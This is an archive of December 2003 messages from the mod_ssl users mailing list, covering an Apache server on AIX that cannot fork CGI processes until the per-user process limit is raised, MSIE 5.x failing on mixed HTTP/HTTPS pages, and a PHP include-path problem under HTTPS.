Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 11 17:27:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5C252A8979; Thu, 11 Dec 2003 17:27:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from d101.x-mailer.de (d101.x-mailer.de [212.162.12.2])
	by master.modssl.org (Postfix) with ESMTP id 31D39A8977
	for ; Thu, 11 Dec 2003 17:27:18 +0100 (CET)
Received: from [127.0.0.1] (helo=172.29.248.231)
	by d101.x-mailer.de with asmtp (Exim 4.24)
	id 1AUTeU-00009m-It; Thu, 11 Dec 2003 17:26:58 +0100
From: Andreas Gietl 
Organization: e-admin internet gmbh
To: modssl-users@modssl.org, Dale Weaver 
Subject: Re: Problems with Apache SSL under load
Date: Thu, 11 Dec 2003 17:26:02 +0100
User-Agent: KMail/1.5.4
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200312111726.02774.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thursday 11 December 2003 17:16, Dale Weaver wrote:
> The SSL site stops executing CGI scripts when load gets a little
> high.  I checked the process list and found 106 httpd servers running.
> System loads at the UNIX level were nominal (< 0.8).
>
> I get tons of the following error in my error logs:
>
> [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily
> unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/navbar1
> [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily
> unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/navbar2
> [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily
> unavailable: couldn't spawn child process:
> /usr/local/apache/sslcgi/register.cgi
>

for executing a cgi apache has to fork a new child process. But forking seems 
to fail. Maybe because of an RLIMIT_NPROC you have on your apache or because 
the server has reached a totel process limit.

>
> Thanks.
>
> ---------------------------------------------------------------------
>
> Dale Weaver                               deweaver@waketech.edu
> UNIX Systems Administrator                (919) 662-3508
> Wake Technical Community College          fax (919) 662-3504
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl                                            tel +49 941 3810884
Ludwig-Thoma-Strasse 35                      
93051 Regensburg                                  mobil +49 171 6070008

PGP/GPG-Key unter http://www.e-admin.de/gpg.html




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 11 20:44:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3DD0FA8963; Thu, 11 Dec 2003 20:44:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 656F5A8936
	for ; Thu, 11 Dec 2003 20:43:55 +0100 (CET)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2003031900) with ESMTP id hBBJhnYX009200;
	Thu, 11 Dec 2003 14:43:49 -0500 (EST)
Date: Thu, 11 Dec 2003 14:43:42 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Cc: Dale Weaver 
Subject: Re: Problems with Apache SSL under load
In-Reply-To: <200312111726.02774.a.gietl@e-admin.de>
Message-ID: 
References: 
 <200312111726.02774.a.gietl@e-admin.de>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 11 Dec 2003, Andreas Gietl wrote:

> > [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily
> > unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/navbar1
> > [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily
> > unavailable: couldn't spawn child process: /usr/local/apache/sslcgi/navbar2
> > [Thu Dec 11 06:00:00 2003] [error] [client ] (11)Resource temporarily
> > unavailable: couldn't spawn child process:
> > /usr/local/apache/sslcgi/register.cgi
>
> for executing a cgi apache has to fork a new child process. But forking seems
> to fail. Maybe because of an RLIMIT_NPROC you have on your apache or because
> the server has reached a totel process limit.

Yes, I concur, this sounds like the most likely cause.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 12 06:37:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 568C6A8947; Fri, 12 Dec 2003 06:37:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web11208.mail.yahoo.com (web11208.mail.yahoo.com [216.136.131.190])
	by master.modssl.org (Postfix) with SMTP id 523C7A8933
	for ; Fri, 12 Dec 2003 06:36:55 +0100 (CET)
Message-ID: <20031212053651.79991.qmail@web11208.mail.yahoo.com>
Received: from [200.30.230.114] by web11208.mail.yahoo.com via HTTP; Fri, 12 Dec 2003 02:36:51 ART
Date: Fri, 12 Dec 2003 02:36:51 -0300 (ART)
From: =?iso-8859-1?q?Jorge=20Carrizo?= 
Subject: RE: Problems with Apache SSL under load
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Jorge=20Carrizo?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

changing max proc per user might help, say to 1000

chdev -l sys0 -a maxuproc='1000'

for AIX 4.3.3.0

HTH
jorge

 --- Boyle Owen  escribió: > >
-----Original Message-----
> > From: Dale Weaver
> [mailto:dale@spiff.wake.tec.nc.us]
> > 
> > I have Apache 1.3.27 compiled with mod SSL using
> openssl 0.9.6.g
> > OS=AIX 5.1.
> > 
> > The SSL site stops executing CGI scripts when load
> gets a little 
> > high.  I checked the process list and found 106
> httpd servers running.
> > System loads at the UNIX level were nominal (<
> 0.8).
> > 
> > I get tons of the following error in my error
> logs:
> > 
> > [Thu Dec 11 06:00:00 2003] [error] [client ]
> (11)Resource 
> > temporarily unavailable: couldn't spawn child
> process: 
> > /usr/local/apache/sslcgi/navbar1
> > [Thu Dec 11 06:00:00 2003] [error] [client ]
> (11)Resource 
> > temporarily unavailable: couldn't spawn child
> process: 
> > /usr/local/apache/sslcgi/navbar2
> > [Thu Dec 11 06:00:00 2003] [error] [client ]
> (11)Resource 
> > temporarily unavailable: couldn't spawn child
> process: 
> > /usr/local/apache/sslcgi/register.cgi
> 
> Might be to do with system resources like file
> descriptors or
> semaphores. I'm afraid I don't know where to check
> these on AIX...
> 
> Rgds,
> Owen Boyle
> Disclaimer: Any disclaimer attached to this message
> may be ignored. 
> 
> > 
> > HTML page responses are still very fast even with
> the errors.
> > 
> > Problem does not occur when number of Apache
> servers < 70.
> > 
> > This is not a great deal of load.  The hardware is
> capable of handling
> > a lot more than that.
> > 
> > Can someone point me in the right direction?  Help
> is greatly 
> > appreciated.
> > Server configs availble on request.  Don't want to
> send large 
> > stuff over
> > the list.
> > 
> > Thanks.
> > 
> >
>
---------------------------------------------------------------------
> > 
> > Dale Weaver                              
> deweaver@waketech.edu
> > UNIX Systems Administrator                (919)
> 662-3508	
> > Wake Technical Community College          fax
> (919) 662-3504
> > 
> >
>
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)             
>      www.modssl.org
> > User Support Mailing List                     
> modssl-users@modssl.org
> > Automated List Manager                           
> majordomo@modssl.org
> > 
> Diese E-mail ist eine private und persönliche
> Kommunikation. Sie hat
> keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der
> SWX Gruppe. This
> e-mail is of a private and personal nature. It is
> not related to the
> exchange or business activities of the SWX Group. Le
> présent e-mail est
> un message privé et personnel, sans rapport avec
> l'activité boursière du
> Groupe SWX.
> 
> This message is for the named person's use only. It
> may contain
> confidential, proprietary or legally privileged
> information. No
> confidentiality or privilege is waived or lost by
> any mistransmission.
> If you receive this message in error, please notify
> the sender urgently
> and then immediately delete the message and any
> copies of it from your
> system. Please also immediately destroy any
> hardcopies of the message.
> You must not, directly or indirectly, use, disclose,
> distribute, print,
> or copy any part of this message if you are not the
> intended recipient.
> The sender's company reserves the right to monitor
> all e-mail
> communications through their networks. Any views
> expressed in this
> message are those of the individual sender, except
> where the message
> states otherwise and the sender is authorised to
> state them to be the
> views of the sender's company. 
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org 

------------
Los mejores usados y las más tentadoras 
ofertas de 0km están en Yahoo! Autos.
Comprá o vendé tu auto en
http://autos.yahoo.com.ar
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 12 16:38:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0C043A8975; Fri, 12 Dec 2003 16:38:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from milquetoast.dpc.ucar.edu (milquetoast.dpc.ucar.edu [128.117.126.106])
	by master.modssl.org (Postfix) with ESMTP id 4AA87A893B
	for ; Fri, 12 Dec 2003 16:38:37 +0100 (CET)
Received: from milquetoast.dpc.ucar.edu (localhost.localdomain [127.0.0.1])
	by milquetoast.dpc.ucar.edu (8.12.8/8.12.8) with ESMTP id hBCFcXgA009359
	for ; Fri, 12 Dec 2003 08:38:33 -0700
Received: (from peterb@localhost)
	by milquetoast.dpc.ucar.edu (8.12.8/8.12.8/Submit) id hBCFcXwR009357
	for modssl-users@modssl.org; Fri, 12 Dec 2003 08:38:33 -0700
Date: Fri, 12 Dec 2003 08:38:33 -0700
From: Peter Burkholder 
To: modssl-users@modssl.org
Message-ID: <20031212153833.GG6203@ucar.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Burkholder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I returned to an issue I'd had some time ago with older MSIE 5.x browsers.
I seemed to have solved the problem by making sure that all content is now
being fetched over https.  Previously I'd had some CSS and javascript coming
over straight http, which might raise an error in newer browsers, but seems
to cause MSIE 5.0 and 5.2 to choke completely.

Does Ralf read these posts?  It may have been obvious to more seasoned SSL
users out there, but if the FAQ had included this line.

    Older MSIE 5.x browsers may choke completely if trying to load pages th=
at
    are a mix of HTTP and HTTPS. =20

I would have been saved much time and anguish.

Thanks,

Peter


--
Peter Burkholder, System Administrator
Digital Library for Earth System Education (DLESE=C2=AE -- http://www.dlese=
.org)
peterb@ucar.edu
DLESE Program Center (DPC)                               ~~~  ~~  ~~~~   __o
UCAR/DPC, P.O. Box 3000       Ph) +1-303-497-2663      ~~~  ~~~~ ~~    _`\<=
,_
Boulder, CO 80307-3000        Fx) +1 303-497-8336 ~~~~ ~~~   ~~~~     (*)/ =
(*)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 12 17:57:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 59274A8975; Fri, 12 Dec 2003 17:57:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spiff.wake.tec.nc.us (spiff.wake.tec.nc.us [198.86.245.2])
	by master.modssl.org (Postfix) with ESMTP id AACC6A893B
	for ; Fri, 12 Dec 2003 17:56:54 +0100 (CET)
Received: from localhost (dale@localhost) by spiff.wake.tec.nc.us (AIX5.1/8.11.6p2/8.11.0) with ESMTP id hBCGpOX38032 for ; Fri, 12 Dec 2003 11:51:35 -0500
Date: Fri, 12 Dec 2003 11:51:24 -0500 (EST)
From: Dale Weaver 
X-Sender: dale@spiff
To: modssl-users@modssl.org
Subject: RE: Problems with Apache SSL under load
In-Reply-To: <20031212053651.79991.qmail@web11208.mail.yahoo.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dale Weaver 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


THANK YOU!!  I just missed it!  It was still set to the default (450). =20

Should work much better now. =20

Thanks again to all who responded.  I think this is the solution.
Won't know for sure until the next wave hits.

I guess I should be nominated for a bonehead award. ;)

---------------------------------------------------------------------

Dale Weaver                               deweaver@waketech.edu
UNIX Systems Administrator                (919) 662-3508=09
Wake Technical Community College          fax (919) 662-3504

On Fri, 12 Dec 2003, [iso-8859-1] Jorge Carrizo wrote:

> changing max proc per user might help, say to 1000
>=20
> chdev -l sys0 -a maxuproc=3D'1000'
>=20
> for AIX 4.3.3.0
>=20
> HTH
> jorge
>=20
>  --- Boyle Owen  escribi=F3: > >
> -----Original Message-----
> > > From: Dale Weaver
> > [mailto:dale@spiff.wake.tec.nc.us]
> > >=20
> > > I have Apache 1.3.27 compiled with mod SSL using
> > openssl 0.9.6.g
> > > OS=3DAIX 5.1.
> > >=20
> > > The SSL site stops executing CGI scripts when load
> > gets a little=20
> > > high.  I checked the process list and found 106
> > httpd servers running.
> > > System loads at the UNIX level were nominal (<
> > 0.8).
> > >=20
> > > I get tons of the following error in my error
> > logs:
> > >=20
> > > [Thu Dec 11 06:00:00 2003] [error] [client ]
> > (11)Resource=20
> > > temporarily unavailable: couldn't spawn child
> > process:=20
> > > /usr/local/apache/sslcgi/navbar1
> > > [Thu Dec 11 06:00:00 2003] [error] [client ]
> > (11)Resource=20
> > > temporarily unavailable: couldn't spawn child
> > process:=20
> > > /usr/local/apache/sslcgi/navbar2
> > > [Thu Dec 11 06:00:00 2003] [error] [client ]
> > (11)Resource=20
> > > temporarily unavailable: couldn't spawn child
> > process:=20
> > > /usr/local/apache/sslcgi/register.cgi
> >=20
> > Might be to do with system resources like file
> > descriptors or
> > semaphores. I'm afraid I don't know where to check
> > these on AIX...
> >=20
> > Rgds,
> > Owen Boyle
> > Disclaimer: Any disclaimer attached to this message
> > may be ignored.=20
> >=20
> > >=20
> > > HTML page responses are still very fast even with
> > the errors.
> > >=20
> > > Problem does not occur when number of Apache
> > servers < 70.
> > >=20
> > > This is not a great deal of load.  The hardware is
> > capable of handling
> > > a lot more than that.
> > >=20
> > > Can someone point me in the right direction?  Help
> > is greatly=20
> > > appreciated.
> > > Server configs availble on request.  Don't want to
> > send large=20
> > > stuff over
> > > the list.
> > >=20
> > > Thanks.
> > >=20
> > >
> >
> ---------------------------------------------------------------------
> > >=20
> > > Dale Weaver                             =20
> > deweaver@waketech.edu
> > > UNIX Systems Administrator                (919)
> > 662-3508=09
> > > Wake Technical Community College          fax
> > (919) 662-3504
> > >=20
> > >
> >
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)            =20
> >      www.modssl.org
> > > User Support Mailing List                    =20
> > modssl-users@modssl.org
> > > Automated List Manager                          =20
> > majordomo@modssl.org
> > >=20
> > Diese E-mail ist eine private und pers=F6nliche
> > Kommunikation. Sie hat
> > keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der
> > SWX Gruppe. This
> > e-mail is of a private and personal nature. It is
> > not related to the
> > exchange or business activities of the SWX Group. Le
> > pr=E9sent e-mail est
> > un message priv=E9 et personnel, sans rapport avec
> > l'activit=E9 boursi=E8re du
> > Groupe SWX.
> >=20
> > This message is for the named person's use only. It
> > may contain
> > confidential, proprietary or legally privileged
> > information. No
> > confidentiality or privilege is waived or lost by
> > any mistransmission.
> > If you receive this message in error, please notify
> > the sender urgently
> > and then immediately delete the message and any
> > copies of it from your
> > system. Please also immediately destroy any
> > hardcopies of the message.
> > You must not, directly or indirectly, use, disclose,
> > distribute, print,
> > or copy any part of this message if you are not the
> > intended recipient.
> > The sender's company reserves the right to monitor
> > all e-mail
> > communications through their networks. Any views
> > expressed in this
> > message are those of the individual sender, except
> > where the message
> > states otherwise and the sender is authorised to
> > state them to be the
> > views of the sender's company.=20
> >=20
> >=20
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)              =20
> >    www.modssl.org
> > User Support Mailing List                    =20
> > modssl-users@modssl.org
> > Automated List Manager                          =20
> majordomo@modssl.org=20
>=20
> ------------
> Los mejores usados y las m=E1s tentadoras=20
> ofertas de 0km est=E1n en Yahoo! Autos.
> Compr=E1 o vend=E9 tu auto en
> http://autos.yahoo.com.ar
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 15 18:54:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0BA7AA8959; Mon, 15 Dec 2003 18:54:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email.sdfair.com (email.sdfair.com [209.132.87.9])
	by master.modssl.org (Postfix) with ESMTP id D3E81A8936
	for ; Mon, 15 Dec 2003 18:54:15 +0100 (CET)
Received: from email.sdfair.com (Not Verified[127.0.0.1]) by email.sdfair.com with NetIQ MailMarshal (v5.5.4.16)
	id ; Mon, 15 Dec 2003 09:54:12 -0800
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C3C334.724156CA"
Subject: Can't Access Includes Above Current Directory
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Mon, 15 Dec 2003 09:54:11 -0800
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Can't Access Includes Above Current Directory
Thread-Index: AcPDNHI6HR+NTW33RZiZr5x51OQmnQ==
From: "Steve Benson" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Steve Benson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C3C334.724156CA
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Hi,

I'm relatively new to your list and configuring Apache with the SSL
module enabled and have a newbie configuration glitch I've not been able
to resolve.

My configuration is:

RH Linux Kernel 2.4.20-8, Apache 2.0.48, OpenSSL -0.9.6l, PHP 4.3.4,
Apache was compiled with SSL and SSL appears to work OK.

My document root is http - /www/sd/htdocs, https - /www/sd/htdocs/jobs

I don't want anyone accessing the jobs directory so I have a redirect in
httpd.conf to send requests for http://www/sd/htdocs/jobs to
https://www/sd/htdocs/jobs instead.

All seems to work fine with http and https access with one blaring
exception.

My PHP scripts have include directives which pull include files from
/www/sd/htdocs/include and that all works fine if run from one of the
http subdirectories i.e.



But if I try the above code from a https directory, say
https://www/sd/hddocs/jobs the it will fail with:
PHP Warning:  main(../../include/prepend.php): failed to open stream: No
such file or directory in /www/sd/htdocs/jobs/index.php on line 4

There is no problem if I change the include location to
/www/sd/htdocs/jobs/include, I can run the scripts fine.  So it seems I
can include at the same level or below but not up any level in the
directory tree if using https.

I've also tried SSI to include a file (for testing) with a similar
result:


unable to include file "../include/middle.html" in parsed file
/www/sdfair.com/htdocs/jobs/index.shtml

Fails as you can see from the https side but works fine if run from
http://www/sd/htdocs/test  (an area where SSL is not enabled).

This is the case with all other parts of the web site without SSL, all
scripts with include directives work fine.

I've searched the web and SSL documentation but I seem to be missing
something here and am just banging my head against a wall.  I've
modified both httpd.conf and ssl.conf 'til I'm blue with no change in
function.

I imagine this is some SSL configuration oversight on my part but so far
I've been unable to find it and would ask for anyone who may be able to
help to please give suggestions on what directive(s) are causing this.
I'd really appreciate a point in the right direction on a resolution.

Thanks for your help,

.......... Steve

------_=_NextPart_001_01C3C334.724156CA
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable






Can't Access Includes Above Current Directory





Hi,




I'm relatively new to your list and =
configuring Apache with the SSL module enabled and have a newbie =
configuration glitch I've not been able to resolve.



My configuration is:




RH Linux Kernel 2.4.20-8, Apache =
2.0.48, OpenSSL -0.9.6l, PHP 4.3.4,  Apache was compiled with SSL =
and SSL appears to work OK.



My document root is http - =
/www/sd/htdocs, https - /www/sd/htdocs/jobs




I don't want anyone accessing the jobs =
directory so I have a redirect in httpd.conf to send requests for http://www/sd/htdocs/jobs to https://www/sd/htdocs/jobs =
instead.



All seems to work fine with http and =
https access with one blaring exception.




My PHP scripts have include directives =
which pull include files from /www/sd/htdocs/include and that all works =
fine if run from one of the http subdirectories i.e.



<?php 


    =
include("../include/prepend.php");


    ....


?>




But if I try the above code from a =
https directory, say https://www/sd/hddocs/jobs the =
it will fail with:


PHP Warning:  =
main(../../include/prepend.php): failed to open stream: No such file or =
directory in /www/sd/htdocs/jobs/index.php on line 4



There is no problem if I change the =
include location to /www/sd/htdocs/jobs/include, I can run the scripts =
fine.  So it seems I can include at the same level or below but not =
up any level in the directory tree if using https.



I've also tried SSI to include a file =
(for testing) with a similar result:




<!--#include =
file=3D"../include/middle.html" -->


unable to include file =
"../include/middle.html" in parsed file =
/www/sdfair.com/htdocs/jobs/index.shtml




Fails as you can see from the https =
side but works fine if run from http://www/sd/htdocs/test  =
(an area where SSL is not enabled).



This is the case with all other parts =
of the web site without SSL, all scripts with include directives work =
fine.




I've searched the web and SSL =
documentation but I seem to be missing something here and am just =
banging my head against a wall.  I've modified both httpd.conf and =
ssl.conf 'til I'm blue with no change in function.



I imagine this is some SSL =
configuration oversight on my part but so far I've been unable to find =
it and would ask for anyone who may be able to help to please give =
suggestions on what directive(s) are causing this.  I'd really =
appreciate a point in the right direction on a resolution.



Thanks for your help,




.......... Steve





------_=_NextPart_001_01C3C334.724156CA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 15 21:50:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 191F5A8959; Mon, 15 Dec 2003 21:50:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email.sdfair.com (email.sdfair.com [209.132.87.9])
	by master.modssl.org (Postfix) with ESMTP id 4584CA8936
	for ; Mon, 15 Dec 2003 21:50:08 +0100 (CET)
Received: from email.sdfair.com (Not Verified[127.0.0.1]) by email.sdfair.com with NetIQ MailMarshal (v5.5.4.16)
	id ; Mon, 15 Dec 2003 12:50:04 -0800
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C3C34D.03F13686"
Subject: Can't Access Includes Above Current Directory - Typo correction
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Mon, 15 Dec 2003 12:50:04 -0800
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Can't Access Includes Above Current Directory - Typo correction
Thread-Index: AcPDNHI6HR+NTW33RZiZr5x51OQmnQAGBznQ
From: "Steve Benson" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Steve Benson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C3C34D.03F13686
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

> Hi,
>=20
Please note my earlier post had a typo in the path of an include
example, all actual include paths have been checked and are valid.

> I'm relatively new to your list and configuring Apache with the SSL
> module enabled and have a newbie configuration glitch I've not been
> able to resolve.
>=20
> My configuration is:
>=20
> RH Linux Kernel 2.4.20-8, Apache 2.0.48, OpenSSL -0.9.6l, PHP 4.3.4,
> Apache was compiled with SSL and SSL appears to work OK.
>=20
> My document root is http - /www/sd/htdocs, https - /www/sd/htdocs/jobs
>=20
> I don't want anyone accessing the jobs directory so I have a redirect
> in httpd.conf to send requests for http://www/sd/htdocs/jobs to
> https://www/sd/htdocs/jobs instead.
>=20
> All seems to work fine with http and https access with one blaring
> exception.
>=20
> My PHP scripts have include directives which pull include files from
> /www/sd/htdocs/include and that all works fine if run from one of the
> http subdirectories i.e.
>=20
>      include("../include/prepend.php");
>     ....
> ?>
>=20
> But if I try the above code from a https directory, say
> https://www/sd/hddocs/jobs the it will fail with:
> PHP Warning:  main(../include/prepend.php): failed to open stream: No
> such file or directory in /www/sd/htdocs/jobs/index.php on line 4
>=20
> There is no problem if I change the include location to
> /www/sd/htdocs/jobs/include, I can run the scripts fine.  So it seems
> I can include at the same level or below but not up any level in the
> directory tree if using https.
>=20
> I've also tried SSI to include a file (for testing) with a similar
> result:
>=20
> 
> unable to include file "../include/middle.html" in parsed file
> /www/sdfair.com/htdocs/jobs/index.shtml
>=20
> Fails as you can see from the https side but works fine if run from
> http://www/sd/htdocs/test  (an area where SSL is not enabled).
>=20
> This is the case with all other parts of the web site without SSL, all
> scripts with include directives work fine.
>=20
> I've searched the web and SSL documentation but I seem to be missing
> something here and am just banging my head against a wall.  I've
> modified both httpd.conf and ssl.conf 'til I'm blue with no change in
> function.
>=20
> I imagine this is some SSL configuration oversight on my part but so
> far I've been unable to find it and would ask for anyone who may be
> able to help to please give suggestions on what directive(s) are
> causing this.  I'd really appreciate a point in the right direction on
> a resolution.
>=20
> Thanks for your help,
>=20
> .......... Steve

------_=_NextPart_001_01C3C34D.03F13686
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable






Can't Access Includes Above Current Directory - Typo =
correction





Hi,




Please note my =
earlier post had a typo in the path of an include example, all actual =
include paths have been checked and are valid.



I'm relatively new to your list and =
configuring Apache with the SSL module enabled and have a newbie =
configuration glitch I've not been able to resolve.



My configuration is:




RH Linux Kernel 2.4.20-8, Apache =
2.0.48, OpenSSL -0.9.6l, PHP 4.3.4,  Apache was compiled with SSL =
and SSL appears to work OK.



My document root is http - =
/www/sd/htdocs, https - /www/sd/htdocs/jobs




I don't want anyone accessing the jobs =
directory so I have a redirect in httpd.conf to send requests for http://www/sd/htdocs/jobs to https://www/sd/htdocs/jobs =
instead.



All seems to work fine with http and =
https access with one blaring exception.




My PHP scripts have include directives =
which pull include files from /www/sd/htdocs/include and that all works =
fine if run from one of the http subdirectories i.e.



<?php 


    =
include("../include/prepend.php");


    ....


?>




But if I try the above code from a =
https directory, say https://www/sd/hddocs/jobs the =
it will fail with:


PHP Warning:  =
main(../include/prepend.php): failed to open stream: No such file or =
directory in /www/sd/htdocs/jobs/index.php on line 4



There is no problem if I change the =
include location to /www/sd/htdocs/jobs/include, I can run the scripts =
fine.  So it seems I can include at the same level or below but not =
up any level in the directory tree if using https.



I've also tried SSI to include a file =
(for testing) with a similar result:




<!--#include =
file=3D"../include/middle.html" -->


unable to include file =
"../include/middle.html" in parsed file =
/www/sdfair.com/htdocs/jobs/index.shtml




Fails as you can see from the https =
side but works fine if run from http://www/sd/htdocs/test  =
(an area where SSL is not enabled).



This is the case with all other parts =
of the web site without SSL, all scripts with include directives work =
fine.




I've searched the web and SSL =
documentation but I seem to be missing something here and am just =
banging my head against a wall.  I've modified both httpd.conf and =
ssl.conf 'til I'm blue with no change in function.



I imagine this is some SSL =
configuration oversight on my part but so far I've been unable to find =
it and would ask for anyone who may be able to help to please give =
suggestions on what directive(s) are causing this.  I'd really =
appreciate a point in the right direction on a resolution.



Thanks for your help,




